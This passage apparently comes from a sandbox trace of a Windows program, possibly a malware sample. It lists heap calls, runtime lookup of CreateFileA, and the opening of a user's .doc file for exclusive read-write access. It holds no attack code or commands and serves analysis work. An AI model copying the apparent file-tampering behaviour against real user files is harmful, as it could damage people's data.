returned 0x88cbe0 [0035.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0035.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0035.902] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0035.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0035.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0035.902] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0035.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0035.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0035.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0035.902] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0035.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0035.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0035.902] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0035.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0035.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0035.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0035.902] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0035.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0035.902] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0035.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0035.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0035.902] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0035.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0035.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0035.902] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0035.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0035.903] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0035.903] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0035.903] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0035.903] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0035.903] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0035.903] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0035.903] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0035.903] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0035.903] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0035.903] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0035.903] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0035.903] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0035.903] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0035.903] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0035.903] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0035.903] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0035.903] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0035.903] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0035.903] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0035.903] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0035.903] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0035.903] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0035.903] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0035.903] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0035.903] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0035.903] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0035.903] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0035.903] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0035.903] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0035.903] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0035.904] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0035.904] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0035.904] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0035.904] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0035.904] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0035.904] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0035.904] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0035.904] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0035.904] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0035.904] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0035.904] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0035.904] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0035.904] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0035.904] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0035.904] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0035.904] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0035.904] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0035.904] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0035.904] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0035.904] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0035.904] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0035.904] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0035.904] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0035.904] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0035.904] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0035.904] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0035.904] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0035.904] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0035.904] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0035.904] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0035.904] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0035.905] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0035.905] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0035.905] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0035.905] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0035.905] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0035.905] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0035.905] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0035.905] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0035.905] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0035.905] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0035.905] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0035.905] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0035.905] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0035.905] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0035.905] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x8898e0 [0035.905] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x8898e0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0035.905] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0035.905] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0035.905] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0035.905] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0035.905] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0035.905] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0035.905] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0035.905] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0035.905] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0035.905] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8898e0 [0035.906] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x8898e0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0035.906] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0035.906] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0035.906] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0035.906] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0035.906] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0035.906] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0035.906] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0035.906] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0035.906] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0035.906] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0035.906] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0035.906] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0035.906] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0035.906] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0035.906] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0x935008 [0035.906] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\sm D80ZGiF.doc", cchWideChar=83, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 83 [0035.906] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x53) returned 0x794b90 [0035.906] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\sm D80ZGiF.doc", cchWideChar=83, lpMultiByteStr=0x794b90, cbMultiByte=83, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\sm D80ZGiF.doc", lpUsedDefaultChar=0x0) returned 83 [0035.906] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x794b90 | out: hHeap=0x770000) returned 1 [0035.906] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0035.906] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0035.906] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0035.906] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0035.906] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0035.906] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0035.906] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0035.906] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0035.907] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\sm D80ZGiF.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\sm d80zgif.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0035.907] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0035.907] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0035.907] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0035.907] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0035.907] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0035.907] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0035.907] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0035.907] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0035.907] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0035.907] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0035.907] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0035.907] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0035.907] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0035.907] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0035.907] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x935008, cbMultiByte=83, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 83 [0035.907] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa6) returned 0x7c5448 [0035.907] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x935008, cbMultiByte=83, lpWideCharStr=0x7c5448, cchWideChar=83 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\sm D80ZGiF.doc") returned 83 [0035.907] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0035.907] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb0) returned 0x7c55e8 [0035.907] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0035.907] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x935008 | out: hHeap=0x770000) returned 1 [0035.907] FreeLibrary (hLibModule=0x76e10000) returned 1 [0035.907] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0035.907] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0035.907] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0035.908] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0035.908] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0035.908] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0035.908] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0035.908] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0035.908] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0035.908] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0035.908] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0035.908] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0035.908] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0035.908] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0035.908] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0035.908] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0035.908] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0035.908] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0035.908] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0035.908] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0035.908] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0035.908] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0035.908] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0035.908] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0035.908] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0035.908] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0035.908] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0035.908] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0035.908] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0035.908] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0035.908] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0035.908] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0035.908] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0035.908] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0035.908] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0035.908] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0035.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0035.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0035.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0035.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0035.909] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0035.909] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0035.909] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0035.909] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0035.909] FreeLibrary (hLibModule=0x76e10000) returned 1 [0035.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0035.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0035.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0035.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0035.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0035.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0035.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0035.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0035.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0035.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0035.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0035.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0035.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0035.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0035.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0035.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0035.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0035.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0035.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0035.909] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0035.910] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0035.910] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 